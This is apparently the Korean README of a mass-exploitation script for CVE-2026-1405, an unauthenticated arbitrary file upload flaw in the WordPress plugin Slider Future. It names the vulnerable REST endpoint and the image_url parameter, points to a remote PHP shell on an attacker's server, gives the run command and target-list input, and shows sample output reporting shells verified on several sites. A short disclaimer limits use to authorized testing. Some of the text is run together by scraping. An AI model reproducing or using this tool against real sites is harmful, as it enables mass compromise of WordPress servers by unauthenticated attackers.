
Slider Future <= 1.0.5 - 인증되지 않은 임의 파일 업로드
Slider Future <= 1.0.5 - 인증되지 않은 임의 파일 업로드
구성 요소: Slider Future (WordPress 플러그인)
영향받는 버전: ≤ 1.0.5
취약점: 인증되지 않은 임의 파일 업로드
CVE: CVE-2026-1405
CVSS 점수: 9.8 (치명적)
WordPress용 Slider Future 플러그인은 1.0.5까지의 모든 버전에서 slider_future_handle_image_upload 함수의 파일 유형 검증 누락으로 인해 임의 파일 업로드 취약점에 노출됩니다. 이로 인해 인증되지 않은 공격자가 악성 PHP 셸을 포함한 모든 파일 유형을 영향을 받는 서버에 직접 업로드하여 원격 코드 실행이 가능해집니다.
/wp-json/slider-future/v1/upload-image/image_url 매개변수를 통해 원격 PHP 셸 업로드 (인증 불필요).http://example1.com
https://example2.com
...
예시: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
다음 항목을 입력하라는 메시지가 표시됩니다:
list.txt)Nxploited)success_results.txt에 자동으로 저장됩니다./wp-json/slider-future/v1/upload-image/image_url.이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다.
소유하지 않았거나 명시적 테스트 권한이 없는 사이트에 대한 무단 사용은 불법입니다.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt